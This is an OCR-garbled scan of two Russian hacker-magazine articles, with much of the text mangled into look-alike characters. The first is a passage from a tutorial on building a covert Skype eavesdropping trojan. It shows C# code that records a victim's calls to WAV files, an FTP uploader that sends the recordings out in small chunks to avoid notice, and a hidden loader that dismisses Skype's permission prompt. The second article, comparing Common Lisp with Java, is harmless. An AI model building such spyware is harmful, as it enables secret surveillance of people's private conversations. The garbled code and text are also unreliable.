быть минимальной, иначе ты рискуешь пропустить секретные звонки. 

СПОСОБ #3 

И вот мы медленно, но верно добрались до самого простого и удобного 
способа записи зкуре-бесед. Немногие знают, что разработчики 5куре 





РАЗРАБОТКА 



поощряютлюдей, имеющихжелание разрабатывать всякие полезняшки 
для ихдетища. Само поощрение выражается в разработке и обновлении 
официального 50К. 

На основе компонент, входящих в ВИК, программисты могут созда- 
вать аддоны или просто приложения на базе Вкуре. В качестве одной 
из вкусностей этого наборчика можно выделить наличие примеров 
для разных популярных языков программирования. Тут тебе и С++, и 
С#, и даже великий и могучий ОеІрЫ не забыт (кстати, не все в курсе, 



ЗАПИСЬ ВХОДЯЩИХ ЗВОНКОВ В ФАЙЛ 



Сгу 

{ 

// Запись входящего звонка 

ІТ (збаСиз == ТСаІІЗСабиз . сІзІпРгодгезз ) 

{ 

//Захватываем звук и сохраняем его в 
//файл (поток пользователя) 
саіі . зеС_СарбигеМісЕеѵісе ( 

ТСаІІІоВеѵісеТуре . саІІІоВеѵісеТуреРіХ# , 

@"С : \бетр\зоипб_изег " + 
саіі . Ісі . ТоЗбгіпд ( ) + 

" . маѵ " ) ; 

// Захватываем звук и сохраняем его 
//в файл (всех остальных собеседников) 
саіі . зеС_0ибриСЕеѵісе ( 

ТСаІІІоРеѵісеТуре . саІІІоЕеѵісеТуреЕіІе , 

@"С : \Сетр\зоипб_реор1е" + саіі . Іб . ТоЗСгіпд ( 
+ " . ма ѵ " ) ; 

} 

} 

сабей (ЕхсерСіоп е) 

{ 

//Выведем ошибки 

АббТехСТоТехСВохІ (ВаСеТіше . Ыом . ТоЬосаІТіше ( ) + 

" : " + 

" Оиг Собе — Невозможно выполнить захват аудио: " ■+ 
саіі . Іб . ТоЗСгіпд ( ) + 

" — Источник ошибки : " + 
е . Зоигсе + 

" — Текст ошибки : " + 
е.Меззаде+ "\г\п"); 



РТР-КЛИЕНТ СРЕДСТВАМИ КЛАССА 
НА ОСНОВЕ КЛАССА РТР РОТ .ЫЕТ 



Сгу 

{ 

РСрСоппесСіоп шуРСрСоппесСіоп = 
пеѵ/ РСрСоппесбіоп ( ) ; 
шуРСрСоппесбіоп .МеззадеКесеіѵеб += 
пеы РСрСоппесСіопЕѵепСНапбІег ( 

соппесСіоп_МеззадеКесеіѵеб) ; 

шуРСрСоппесбіоп . НозС = " Тбр : / /шуібрзегѵег " ; 
шуЕСрСоппесбіоп .ІІзегЫаше = "изегпаше"; 
шуЕСрСоппесбіоп . Раззѵ^огб = "раззѵ^огб" ; 
шуРСрСоппесСіоп . КешоСеВігесбогу = 

" /бешр/СезСТогхакер" ; 



шуЕСрСоппесСіоп .Ііріоаб ( 

@"С : \Сешр\зоипб.рагС1 .шрЗ " , 

" зоипб.рагбі .шрЗ " ) ; 

} 

сабсЬ (ІА/еЬЕхсерСіоп ех) 

{ 

Сопзоіе . ѴТгіСеЫпе ( ех . ТоЗбгіпд ( ) ) ; 

} 

сабсЬ (Ехсербіоп ех) 

{ 

Сопзоіе .МгШеЫпе (ех . ТоЗбгіпд ( ) ) ; 

} 



ѵоіб соппесСіоп_МеззадеКесеіѵеб (оЬ^есС зепбег, 

ЕСрСоппесбіопЕѵепСАгдз е) 



{ 



Сопзоіе .1л/гіСеЫпе (е .Меззаде) ; 
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СпапдесЗ ЗЕНЕ ш шгк деап іаіезі Ргоіосоз 8 
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5ирег Цссг 
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ФОРУМ ПОДДЕРЖКИ РАЗРАБОТЧИКОВ 



_І 



2І 

І@Г* 4 



но сам 5 куре написан на РеІрЫ]. Одним словом, этот 5РК — рай для 
программистов, решивших поковырять 5 куре. 

Для насстобой 5РК — это даже круче, чем рай. На базе этого каркаса 
мы сможем нетолько записать голосовое общение пользователя, но и 
перехватить полученные и отправленные им текстовые сообщения, фай- 
лы, совершитьзвонокотего имени ит.д. Но не будем бежать впереди 
паровоза, восхваляя то, что еще пробовали, а познакомимся со всеми 
нюансами на примере. Лезь на наш РѴО и устанавливай 50 К. Установка 
недолжна вызвать затруднений. Просто запусти файликиз папочки 5йК 
и соглашайся со всем, чтоутебя спросят. Завершивустановку — за- 
пускай ѴізиаІЭіисІ іо (я использовал 2008-ю версию) и создавай новый 
проект. В качестветипа проекта выбери шаблон ЗЕНЕѵѵс. 

Пока утебя создается проект, я вкратце расскажу про шаблон ЗЕНЕѵѵс. 

По правде говоря, это не совсем шаблон в привычном нам понимании. 

В реале это полноценный пример, демонстрирующий все возможности 
хваленого мной 50К. Демка написана оченьхорошо и разбираться в ее 
коде одно удовольствие. 

До начала погружения в код стартани свой скайп и запусти 
созданный прожект (я сейчас про шаблон). При выполнении ис- 
ходника скайп преданно отрапортует, что такое-то приложение 
пытается получить доступ к его функциям. Давай добро и попро- 
буй отправить через скайп текстовое сообщение. Не успеешь 
его запулить, как весь отправленный текст появится в текстовом 
поле. Это означает, что демонстрационный пример успешно 
работает. 

Мощность примера не вызывает сомнений. На первый взгляд может 
показаться, что его коддает ответы на самые изощренные вопросы, 
связанныеспрограммированием скайпа. Носамая нужнаядля насфича — 
записьразговоров, в нем, увы, не реализована. Что ж, будем исправлять 
ситуацию. 



Перейди в редактор кода и найди описание метода ОигСаІАЗіаІиз. В его 
теле описано получение различной инфы отекущем звонке. Это все 
хорошо и безумно интересно, но мы хотим другого. Сотри имеющийся код, 
и вместо него перепиши содержимое третьей врезки. Пока ты будешь 
переписывать, я расскажу отом, что там происходит. 

В самой первой строке я выполняю проверку и сравниваю значение пе- 
ременной зіаіиз с со значением сІзІпРгодгезз перечисления ТСаІІЫаІиз 
(ух, настальгическая дельфячья буковка Т перед именемтипа :)). Если они 
равны, то беседа в самом разгаре и пора начинать запись звука. 

Теперь приготовься и неупади со стула, когда узнаешь, чтозаписьосу- 
ществляется всего лишь одной строкой: 

саіі . зеЦ_СарЦигеМісБеѵісе ( 

ТСаІІІоБеѵісеТуре . саІІІоБеѵісеТуреРіІе , 

©"Путь, куда сохранять" + 

саіі . Ій. ТоЗСгіпд ( ) + ".хѵаѵ" ); 

В первый параметр метода 5еІ_сарІигеМіс0еѵісе требуется передать 
устройство, на которое будет выведен потоке микрофона. Типы устройств 
хранятся в перечислении ТСаШоРеѵісеТуре. Мы хотим захватывать звук 
в файл, поэтому ставим саШоОеѵісеТуреЕіІе. Второй параметр зависит от 
первого. В нашем случае в нем передается путь к файлу, в который будем 
сохранять результатзаписи. 

Обрати внимание, что вызовом метода зеІ_сарІигеМісОеѵісе мы со- 
храним лишь голос нашей жертвы, а те, с кем она говорит — останутся 
за кадром. Записывать собеседников мы будем при помощи метода 
зе1_0и!риЮеѵісе: 

саіі . зеС_0и1іри1іВеѵісе ( 

ТСаІІІоБеѵісеТуре . саІІІоБеѵісеТуреРіІе , 
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©"Путь куда сохранять" + 

саіі . Ісі. ТоЗСгіпд ( ) + ".маѵ"); 

Параметры у него точно та кие же, как и у предыдущего, поэтому дважды 
рассказывать не буду:]. 

Можно сказать, что все готово. Компиль и запускай проект. При стар- 
тинге не забудь одобрить в скайпе инжект, иначе ничего захватить не 
получится. 

Попробуем протестировать наше приложение в реальныхусловиях. 
Попроси своего приятеля, чтобы он позвонил тебе по скайпу и немного 
поболтал стобой. 

Если при переписывании листинга ты был крайне внимателен, то по 
переданным в методы сарІигеМісОеѵісе и зеЫЭіПриЮеѵісе путям для 
сохранения файлов будутлежать свежеиспеченные ѴѴАѴ’ки. Прослу- 
шай их в своем плеере и убедись, что все работает как надо. 
Пользоваться 50 К крайне просто (особенно если пишешь под .МЕТ] и 
его возможности будут однозначно востребованы при разработке про- 
фессионального зкуре-іоддег’а. 

Я не буду тебе рассказывать, как выполнять перехваттекстовых со- 
общений и другой полезной инфы. Все это делается путем вызова 



ВЫВОД ФАЙЛОВ 

Рано или поздноты столкнешься с еще одной большой проблемой — 
сбором урожая. Безошибочно сейвить всю болтовню жертвы, конечно 
же, хорошо, но какой толкот награбленного добра, если его нельзя 
забрать и проанализировать? Верно, никакого. 

Шпион для скайпа — это не кейлоггер и его логи так просто по почте не 
отправишь. Малотого, что файлы со звуком брутально весят, такеще и 
пересылать их протоколу зтір совсем не айс. 

Задача вывода файлов усложняется в несколько раз, если юзер 
сидит не на безлимите (да-да, такие еще встречаются]. В этом случае 
пересылка больших по объему файлов не останется незамеченной в 
статистике и это обязательно насторожит продвинутого пользователя. 
Особенно, когда он будет испытывать большиетормоза во время на- 
хождения в сети. 

Немного покумекав, я пришел к следующему алгоритму: 

1. Кодирование каждого файла со звуком в формат трЗ. Изначально 
все разговоры нашей жертвы мы писали в ѴѴАѴ’ы, которые очень 
много весят. Например, средний размер продолжительной беседы 
(около часа) может достигать 50-80 метров (в зависимости от настро- 



У ОФИЦИАЛЬНОГО $БК ЕСТЬ ОДИН, НО КРАЙНЕ 

большой, минус.лри запуске твоего 

ПРИЛОЖЕНИЯ СКАЙП БУДЕТ ПОСТОЯННО 
БИТЬ ТРЕВОГУ 



парочки методов, которые подробно документированы. Доки (само 
собой на английском] всегда доступны на официальном портале: 
ЬирзѴ/сІеѵеІорег.зкѵре.сопп/Росз/ЗкѵреДСОМЕіЬ . Если ты испыты- 
ваешь проблемы с инглишем, то не расстраивайся. Просто посмотри 
код шаблона приложения. Думаю, ты во всем разберешься. В крайнем 
случае — пиши мне. 

ДОСАДНЫЕ ОГРАНИЧЕНИЯ 

У официального ЗБ К есть один, но крайне большой, минус. При запуске 
твоего приложения скайп будет постоянно битьтревогу. Сам понима- 
ешь, если жертва увидит странное окошко с вопросом: «а разрешить 
ли этому приложению доступ?», то с 99,9% вероятностью она нажмет на 
кнопочку «Нет» и ты останешься в пролете. Чтобы этого не случилось, 
я рекомендую тебе делать две проги — одна будеториентирована на 
захватзвука и написана на удобном С#, а вторая является своего рода 
загрузчиком. Ее основной целью будет незаметное пребывание в 
системе, скрытие/нажатие кнопок ненужных окон (это про окошко одо- 
брения запуска]. Крометого, через эту самую прогу-загрузчик можно 
будет реализовать все функции удаленного управления и т.д. В общем, 
идеюты понял. 

КАК БОРОТЬСЯ С «НЕНУЖНЫМИ» ОКНАМИ? 

И во втором и в третьем методе захвата скайп -бесед мы напоролись 
на проблему — взаимодействие с окнами чужого приложения. Я 
говорил, что о работе с чужими окнами в нашем журнале мы рас- 
сказывали много раз (рекомендую статью про угон кошельков веб 
мани, опубликованную года 3-4 назад], но если ты только влился в 
нашу тусовку и незнаешь, что да как, не поленись, зайди на Ьіпд. 

ъпипоищитамна предмет функций Рі псІѴѴі псіоѵѵ, СеіѴѴіпсІоѵѵТехЕ 
РозЛЧеззаде. Поисковик мелкомягких сразу же тебя выведет на 
нужный раздел МЭОІЧ’а и ты быстренько сможешь познакомиться с 
этими полезными функциями. 



ек]. Пересылать такой файл в чистом виде, мягко говоря, нереально. 
Перекодировка в формат трЗ частично решит проблему размера. 

Если выставить максимальную степень сжатия и минимальный 
битрейт, то размер удастся сократить в 3-4 раза. Это уже лучше, но не 
идеально. Вывод тех же 5 метров может показаться затруднительным. 
2. Разбивка файла на более мелкие части. В предыдущем абзаце я 
сказал, что даже такая операция как кодирование файла в трЗ не 
спасет тебя от проблем с пересылкой. Лучше всего разбить сжатый 
файл на более мелкие части и отправлять уже их. Например, раздро- 
бить трЗ на частички по 300-500 Кб. Такие крохотульки будет куда 
проще и быстрее вывести с поля битвы. 

По подготовке файлов к отправке я вроде все сказал. Быстренько про- 
бежимся по способу отправки. Несколькими абзацами выше, я заявил, 
что пересылать та кие вещи по згтЛр не очень правильно, да и попро- 
сту проблематично. Куда лучше заюзать проверенный годами старый 
добрый Лр! Встроить в свое .ЫЕТ-приложение ЕТР-клиент — что может 
быть проще? Взгляни на врезку и убедись сам. 

НАРРѴЕМ 

Нет предела возможностям человека и нет предела совершенству. Не- 
решаемыхзадач не бываети все трудности можно преодолеть. Сегодня 
я рассказал тебе про строение скелета ѵоісе-іоддег’а, и дальнейший 
выбор за висит только от тебя. Либо ты сведешь всю полученную инфу в 
одну кучу и создашь неуловимого шпиона для скайпа, либо разработа- 
ешь профессиональный инструмент для легального бэкапа перегово- 
ров :]. Выборза тобой, мне лишьостается попрощаться и пожелать тебе 
удачи! 

Р.5. Полные исходники моего трояна не проси. Все равно не дам, я 
жадный :]. А если серьезно, я не поддерживаю такие вещи и не хочу, 
чтобы многие тупо компили готовый проект и приступали к боевым 
действиям. Прослушка разговоров — это вторжение в личную жизнь, 
а, помимо незаконности, еще и подло! До встречи! т 
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НОЬУѴѴАР: 

иЗРѴЗ. ША 

СОММОЙ ПЭР: ПРОСТОТА И МОЩЬ 
ПРОМЫШЛЕННОГО СТАНДАРТА 

В РАМКАХ ЭТОЙ СТАТЬИ МЫ ПОПРОБУЕМ 
СРАВНИТЬ ПРИЕМЫ ПРОГРАММИРОВАНИЯ НА 
ЯЗЫКЕ СОММОЙ изр И ЯЗЫКЕ іж . 

НА КОНКРЕТНЫХ ПРИМЕРАХ МЫ 
ПРОДЕМОНСТРИРУЕМ КОНЦЕПТУАЛЬНЫЕ 
ОГРАНИЧЕНИЯ ЯЗЫКА МА И ПРИВЕДЕМ 
АРГУМЕНТЫ, ГОВОРЯЩИЕ О НЕОБХОДИМОСТИ 
ПРИМЕНЯТЬ БОЛЕЕ СОВЕРШЕННЫЙ. ЛЕГКО 
РАСШИРЯЕМЫЙ И ПРОВЕРЕННЫЙ ВРЕМЕНЕМ 
ЯЗЫК ПРОГРАММИРОВАНИЯ. 



ПОНЕМУ ВСЕ-ТАКИ ЛИСП? 

Первый вопрос, который бы появился у меня, 
будь я на месте читателя: «Чем эта статья 
отличается от очередного пиара І2ее/. пеТ/ 
руТ Гт о п/] зТ/ а 5 р/ и тому подобных?». Отлично, 
попробую на него ответить: 



• Тем, что она о языке программирования, 
который не было бы ошибкой назвать «бес- 
смертным» на фоне рождающихся и умираю- 
щих языков и технологий. 

• И тем, что в ней не будут приводиться 
абстрактные (и сомнительные] доводы вроде: 



«Ты посмотри, все на нем пишут» или «Все 
пользуются М5 СНТісе, а ведь он написан на 
С++», или «Видишь, какая большая корпора- 
ция МісгозоЛ, а они говорят, что надо писать 
на .ЫЕТ». 

• А еще, наверное, тем, что здесь будут при- 
водиться конкретные факты, подтверждающие 
не сопоставимые ни с чем преимущества. 

В современном мире даже начинающий про- 
граммист догадывается, что предоставляемые 
корпорациями технологии в первую очередь 
нужны им самим для укрепления позиций на 
рынке, и только в последнюю очередь для 
того, чтобы ты быстро и качественно разраба- 
тывал программный продукт. Для них важно 
другое: насколько конкретно ты влипнешь в 
эти самые технологии. Итак, пока одни черты- 
хаются в мире МісгозоІТ: и надеются, что луч- 
ший из миров — мир ІВМ, а в мире I В М дума- 
ют, что у соседа «трава зеленее» и посмат- 
ривают в сторону МісгозоЛ, мы займемся 
настоящим программированием. Конечно, 
вряд ли нам удастся в рамках одной короткой 
статьи привести все аргументы и рассказать 
обо всех сокровищах Лисп-культуры. А вот 
основополагающие концепции показать впол- 
не реально. 

І_ізр — это сокращение от Ы51: Ргосеззіпд, 
что в переводе значит: «обработка списков». 
Следовательно, можно предположить, что 
язык предназначен лишь для обработки 
списков. Но есть один, казалось бы, незна- 
чительный (для непосвященных] нюанс: про- 
граммы на Лиспе также представляются в 
виде списков. Итак, что же мы получаем? Мы 
получаем язык, который предназначен для 
обработки списков (в момент своего рожде- 
ния] с помощью программ, представляемых в 
виде списков. Звучит сумбурно, но это, соб- 
ственно, и есть главный секрет успеха. 

Если ты решил замутить свой язык программи- 
рования и захотел позаимствовать это реше- 
ние — ты получишь еще один диалект Лиспа. 
Если же ты пожелаешь, чтобы в твоем языке 
была поддержка всех существующих на дан- 
ный момент технологий программирования, то 
получишь что-то подобное диалекту Соттоп 
Ызр. Может быть, какие-то возможности твоего 
диалекта и не будут входить в этот стандарт, 
но вряд ли для тех, кто программирует на 
Лиспе это будет серьезный аргумент — макрос, 
расширяющий язык дополнительной возмож- 
ностью, пишется за 1-2 часа (а то и за пару 
минут]. 

ЧТО И НЕ СНИЛОСЬ РАЗРАБОТЧИ- 
КАМ НАША 

Здесь я опишу возможности языка Ызр, кото- 
рые отсутствуют в языке ^ѵа или имеют край- 
не урезанные варианты, не вписывающиеся 
в модель описания вычислений языка и 
имеющие проблемы интеграции друг с другом. 
Приступим! 

• Единообразный и древовидный синтаксис, 
позволяющий максимально просто генериро- 
вать программный код. 
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Главная и нерешаемая проблема языков с так называемым «синтак- 
сическим сахаром» заключается в этом самом сахаре. В принципе, 
в любом языке можно создать функцию (метод), получающую на вход 
строку с программой на этом языке, и, разбив ее на лексемы, действо- 
вать подобно интерпретатору. Или, сохранив строку в файл, вызвать 
компилятор, и откомпилированный байт-код (к примеру, файл *.сІа55І 
загрузить в систему (в нашем случае в іѵт). Да вот только делается так 
крайне редко. Как думаешь, почему? А все очень просто — никакой 
здравомыслящий разработчик не станет усложнять свой проект (может 
быть, и без того сложный) парсером исходного кода, тем более, это 
очень круто может ударить по производительности. Как в случае пар- 
синга входной строки, так и сохранения на диск, и при вызове внешне- 
го компилятора (да еще, блин, загрузке в систему получившегося байт- 
кода). Никакие костыли вроде «Аннотаций» не решают проблему — воз- 
иться с генерацией синтаксических конструкций языка довольно долго 
и чревато ошибками. Об отладке говорить вообще не приходится. Тем 
не менее, жизнь заставляет генерировать массу кода перед его ком- 
пиляцией, например, для работы с таблицами базы данных. Таблицы, 
типы полей и нюансы зці-запросов, зависящих от базы данных — все 
это требует генерации специфичного программного кода. Так что, мне- 
ния скептиков и консерваторов из серии «да зачем это надо» перетекли 
(в создаваемый, видимо, ими же) так называемый «деплой-код» (беріоу 
собе). Конечно же, все реализовано не очень хорошо по той простой 
причине, что язык имеет множество синтаксических конструкций (хотя 
программы на Яве генерировать, наверное, в разы проще, чем про- 
граммы на С++ или Регі). 

В Лиспе же все происходит с точностью до наоборот: программы на 
Лиспе генерировать не просто легко — это является частью практики 
программирования на Лиспе. Можешь убедиться в этом сам, посмот- 
рев какие-нибудь Лисп-библиотеки на ЬирУ/сбкі.пеК Например, 
библиотеку СбОСС. Да и знаменитый лиспер Пол Грэхэм так пишет о 
своей ѴіаѵѵеЬ: «Исходный текст редактора ѴіаѵѵеЬ на 20-25% состоял из 
макросов». В общем, в процессе программирования на Лиспе писать 
программы, которые пишут другие программы — совершенно три- 
виальный процесс. Жаль, что всякие разные «изобретатели деплой- 
кода» не в курсе. И насколько мы продвинулись в развитии програм- 
мирования, если, как пишет Пол Грэхэм: «Макросы, очень похожие на 
современное представление о них, были предложены Тимоти Хартом 
(ТітоіЛу Наіі) в 1 964 году, через два года после того как І_ізр 1 .5 был 
выпущен». Может быть, монстров в нашей жизни было бы гораздо 
меньше, если бы современные горе-изобретатели знали об этом? 

Итак, синтаксический сахар мешает появлению в языке возможностей 
простой и понятной кодогенерации. Отсюда следует идея: нельзя ли 
нам этот недостаток как-нибудь обойти? В конце концов, можно же 
создать собственный препроцессор! Скажем, если бы мы писали на 
языке баѵа в синтаксисе Лиспа, то код: 

ргіѵаСе ЗСгіпд туМеСНюб ( іпС х) { 

АггауЬізС<?> аггау = печл АггауЫзС<?> ( 10 ) ; 

ІогДіпС і = 0; і < х; і++) аггау [і] = тубипс(і); 

} 

; ; выглядел бы как-нибудь так: 

(ргіѵабе Збгіпд туМеДЬоб (іпб х) 

(АггауЫзС () аггау (пето АггауЬізб () 10) ) 

(бог ((і 0) (і < х) (1+ і) ) (аггау і (тубітс і) ) ) 

) 

Не считая статической типизации (которая во многих случаях проигры- 
вает типизации динамической) и отхода от префиксной нотации в 
описании цикла, в списке — (і < х), этот код не по семантике, но по 
синтаксису вполне соответствует символьному выражению в Лиспе 
(з-ехргеззіоп). Ну что, раздуем философский спор о том, что удобнее и 
читабельнее? Так или иначе, второй вариант представляет собой связ- 
ный список — вот его-то как раз и чрезвычайно просто генерировать 
и обрабатывать, особенно с помощью языка, в котором десятки лет 
совершенствовались и оттачивались механизмы работы со списками! 



Это было бы, пожалуй, моим гениальным открытием, но я не первый, 
кто к этому пришел — одно из изобретений корпорации Егапг ( бНр:// 
Ггапг.сопп ) — язык ЛІ_ ( ЬЛр://ѵѵѵѵѵѵ.1тапг.сот/5иррогі/боситеЩабоп/6.2/ 
бос/дУііш)- Вот что пишут сами разработчики: «баѵа в Ызр (ді) — это 
язык для записи программ, выполняющихся на виртуальной машине 
баѵа (|ѵт)». 

Ну а теперь поговорим о других концепциях, косвенно или явно сле- 
дующих из данной. 

ЭФФЕКТИВНАЯ ГЕНЕРАЦИЯ КОДА ВО ВРЕМЯ ВЫПОЛ- 
НЕНИЯ И ЕГО ОПТИМИЗАЦИЯ 

Любой более-менее приличный язык, поддерживающий функциональ- 
ную парадигму (Ызр, РуіЛоп, НазкеЩ, имеет конструкцию «батбсіа», 
позволяющую создать функцию во время выполнения (в гип-бте). В 
Лиспе это происходит так: (зеіі аббБ (ІатЪба (х) (+ х 5))). 

Теперь переменная асісіб содержит объект-функцию. Мы ее можем 
передавать в качестве параметра и вызывать, например, с помощью 
ГипсаІЕ (бипсаіі аббБ 4 ). Особенно интересна возможность ее 
передачи в качестве параметра. Функции, получающие такой аргумент, 
называются «функционалами». Отличным примером является «отобра- 
жающий функционал» МАРСАР. Но об этом чуть позже. 

В Лиспе есть возможность скомпилировать функцию, сгенерирован- 
ную в гип-бте. Допустим, во время выполнения мы составили список, 
представляющий подпрограмму, которую нам нужно добавить в систему 
(между прочим, без какой-либо записи на жесткий диск и вызова внеш- 
него компилятора). Пусть наша программа для простоты будет такой: 

(зеСд ргодгат 1 (беіип бшіс (х у) (ІізС х (* у у)) 

)) ;епб беіші, зеСд 

Теперь мы можем добавить ее в текущую лисп-систему: (еѵаі 
ргодгат) . Воспользуемся стандартной функцией ТІМЕ для получения 
времени выполнения: 

(біше (Іоор гереаб 10000 (бо (бшіс 3 4)) 

)) ;епб Іоор, біте 

И если мы произведем компиляцию добавленной в гіт-бте функции: 
(сотрііе ' Пипс) , то еще раз выполнив тестовый прогон (сіше 
(Іоор ...) , получим значительный выигрыш в скорости выполнения 
(на бізрѵѵогкз у меня получилось —2.5, что, конечно же, не предел). 

ФУНКЦИОНАЛЫ 

Это функции, которые получают в качестве аргументов (или одного 
из аргументов) другую функцию. В статье я расскажу только об одном 
— МАРСАР. Его еще называют «Отображающим функционалом». 
Несмотря на страшное название, работает он очень просто: принимает 
в качестве аргумента какую-либо функцию и список элементов, с кото- 
рыми ее надо вызвать, и затем строит новый список из результатов: 

(шарсаг (ІатЪба (х) (+ х 5)) (ІізС 1 2 3 4 5)) 

> (б 7 8 9 10) 

Или : 

(тарсаг 1 ргіпС 

1 ("Ъеге баСа:" 4 4.0 (:етаі1 1ізр@1ізр . ги) ) ) 

> 

"беге баСа:" 

4 

4.0 

( : ЕМАІЬ ЫЗРОЫЗР . Кб) 

Как видишь, функция, принимаемая в качестве первого аргумента, 
может быть как встроенная, так и определенная тобой или созданная, 
исходя из каких-то гип-бте обстоятельств. 
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Попробуем сделать на языке Іаѵа последний пример и начнем мы 
с определения функции во время выполнения. Правда, в Іаѵа нет 
функций, а есть лишь методы классов... к счастью, имеется очередной 
«костыль» — анонимный класс: 

ОкфесС Пипс = петлг ОЬ^есСО { 

риЫіс ОкдесС гип(х){ геСигп х + 5; } 

} 

Он, кстати, лишь создает иллюзию определения в гип-бте — 
на самом деле, происходит запись программы на диск, и ее компиля- 
ция в файл .с Іа 55. Ты можешь сам в этом убедиться — сохрани приве- 
денную ниже программу в файл Мудаѵа и скомпилируй ()аѵас Му^аѵа): 

сіазз Му { 

зСаСіс сіазз ОкзесС2 {рикііс ѵоік гип ( ) { } } 
рикііс зСаСіс ѵоік шаіп (ЗСгіпд [ ] агдз) { 

ЗузСеш. оиС .ргіпЫп ( "Неііо ! \п" ) ; 

// если компилятор попробует с ' оптимизировать 
кооіеап к = ! (агдз . ІепдЫі == 0); 

Ок^есЫ окз ; 

ІТ (Ь) { 

окз = пем ОкзесС2(){ 

рикііс ѵоік гип ( ) { Зузбеш. оиб .ргіпЫп ( " ІЫі ѵагіапб");} 
} ; 

} еізе { 

окз = пем ОкзесЫ(){ 

рикііс ѵоік гип () (ЗузЪет.оиЫ ргіпЫп ( "2 РЬ. ѵагіапЫ ) ; } 
} ; 

} 

окз . гип ( ) ; 

} 

} 

Теперь зайди в каталог с классом и полюбуйся на два файла: Му$1 .сіазз 
и Му$2.с1а55. Так что, если не хочешь тормозов, подумай о том, чтобы 
разместить соответствующий каталог в оперативной памяти. Да, и самое 
ужасное в подобных костылях это то, что создается набор некоторых пра- 
вил, совершенно непредсказуемых и ниоткуда не следующих. В примере 
выше, если ты избавишься от вложенного класса 0Ьіес1:2 и попробуешь 
использовать ОЬіеср то файл просто не скомпилится. А все потому, что 
вдруг появилось новое правило: анонимный класс должен переопреде- 
лять существующий метод суперкласса, а не определять новый. 

Далее об отображающем функционале. В стандарте баѵа нет ничего 
подобного тарсаг, поэтому реализуем ее сами: 

ішрогС заѵа.иСіі . АггауЫзС; 

сіазз РипсЫопаіз { 

// Этот класс не обязан быть вложенным 
акзСгасб збаСіс сіазз РипсЫоп { 
рикііс акзСгасб ОкзесС са11(ОкзесС окз ) ; 

} 



рикііс збаСіс АггауЬізЫОкз есб> тарсаг ( 

РипсЫоп іп, АггауЬізЫОкз есЫ аггау) { 

АггауЬізЫОкз есЫ гезиіЬ = петѵ 
АггауЬізЫОкз есЫ (аггау. зіге ( ) ) ; 

1ог(ОкзесЬ окз : аггау) гезиіЫ акк ( :Еп . саіі ( окз ) ) ; 

} 

} 

Дело за малым — применить это чудо инженерной мысли: 

рикііс зЬаЫс ІпЬедег пит = 5; 

рикііс зЬаЫс ѵоік таіп (ЗЬгіпд [ ] агдз){ 

АггауЬізЫОкз есЫ агЬізЬ = печѵ АггауЬізЫОкз есЫ () ; 
агЬізЬ . акк ( 4 ) ; 
агЫзІ . акк ( 5) ; 
агЫзІ . акк ( б) ; 

пит += пит; //какие-то изменения контекста 
агЬізЬ = РипсЫопаіз .тарсаг (пем РипсЫоп(){ 
рикііс ОкзесЬ саіі (ОкзесЬ окз ) { 
геЬигп (ІпЬедег)окз + пит; 

} } , агЫзі ) ; 

ЗузЬет. оиЬ . ргіпЫп (агЫзІ . ЬоЗЬгіпд ( ) ) ; 

} 

И всю эту фигню я должен писать вместо (тарсаг (ІатЬба (х) (+ пит 
5]] ‘(4 5 6]]!? Между прочим, тут обнаружилось новое правило. Если 
захочешь использовать в определяемом анонимном классе локальную 
переменную, то тебя ждет жестокий облом — так делать нельзя, если 
только не объявить ее как ііпаі. 

А теперь посчитаем количество сущностей, которые мы наплодили для 
реализации этой идеи. Лисп: 

1. Стандартная функция тарсаг. 

2 . Определение функции, которую мы передаем в качестве параметра с 
помощью стандартной ЕатЬсІа. 

3. Список элементов (любого типа), 
баѵа: 

1. Новый класс Рипсбопз, который мы ввели в систему, чтобы опреде- 
лить нужный метод. 

2 . Этот класс объявляет абстрактный метод са II, который должны будут 
определять анонимные классы. 

3. Собственно определение нужного нам метода тарсаг. 

4. Объявление и создание АггауЕізЕа, в который мы будем собирать 
значения. 

5. Последовательные добавления в АггауРЫ значений. 

6. Вызов статического метода тарсаг класса Рипсбопаіз. 

7. В качестве первого аргумента передаем экземпляр анонимного 
класса, наследника Рипсбоп. 

8. Функциональность сосредоточена в переопределяемом методе саіі. 

9. Вторым аргументом передаем АггауРЫ с элементами типа 0Ь)есР 

10 . Присваиваем результат другой или этой же переменной типа 
АггауРІ5І;<0Ь)ес1;>. 

11 . Выводим на консоль строку, описывающую массив результатов. 

12 . А чтобы такая строка получилась, нам надо вызвать метод ІоЭігіпдО 
объекта типа АггауРІ5І<0Ь]ес1:> . 

Не правда ли, слишком громоздко? Программирование на таком низ- 
ком (по сравнению с Лиспом) уровне чревато ошибками, трудностью 
сопровождения кода и — далее — созданием разного инструментария, 
исправляющего недостатки языка и... в общем, разработчикам всевоз- 
можных есіірз’ов работы хватит надолго. 

УДОБНОЕ СРЕДСТВО ИНИЦИАЛИЗАЦИИ 
СЛОЖНЫХ СТРУКТУР ДАННЫХ 

Обычно (но не всегда) сложная структура данных вполне укладыва- 
ется в шаблон «дерево». То есть, фактически, в «связный список», 
он же — ацикличный граф. Очень часто нужно без лишних хлопот 
быстро его создать и/или инициализировать. Причем на практике нам 
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еще может понадобиться древовидная структура (смотри картинку] 
РАЗНОСОРТНЫХ данных. Сравним удобство реализации. 

Реализация на І_ізр: (зекд кгее 1 (зушЬоІ ( " зкгіпд" ( : пишЬег 
555)) 5.5)). На 5аѵа это можно было бы сделать так: 

Ызк<0ЬП еск> Іізк = пем АггауЕізк<0Ьд еск> ( ) ; 

// Примитивного типа данных «Символ» в баѵа не суще- 
ствует, так что, допустим, у нас есть такой класс: 
Іізк . абб (пем ЗутЬоІ ( " зушЬоІ " ) ) ; 

Ьізк<ОЬзеск> пезкеб = пем АггауЬізк<ОЪз еск> ( ) ; 
пезкеб . абб ( " зкгіпд " ) ; 

Ьізк<СЬдеск> пезкеб2 = пеѵі АггауЫзк<СЬд еск> ( ) ; 
пезкеб2 . асісі (пеіл ЗушЬоІ ( " : пишЬег" ) ) ; 
пезкеб2 . асісі ( 555 ) ; 
пезкеб. абб (пезкеб2 ) ; 

Іізк . абб (пезкеб) ; 

Іізк . асісі (5 . 5 ) ; 

Количество порождаемых сущностей сравни сам :]. Только здесь простое 
добавление нового класса ЗутЬоІ нас уже не спасет. Тип ЗутЬоІ — это 
часть архитектуры Ызр’а и центральный элемент символьных вычисле- 
ний. Реализация в іаѵа будет в любом случае иметь ограничения. 

А если каких-то элементов данных у меня в настоящий момент нет? 
Тогда я могу создать список, блокируя (с помощью функции цио1;е или 
сокращения «'»] элементы, которые мне надо включить в список как 
есть, то есть, не вычисляя их: 

(Іізк 4 " 1 е а к " 

( Іізк 

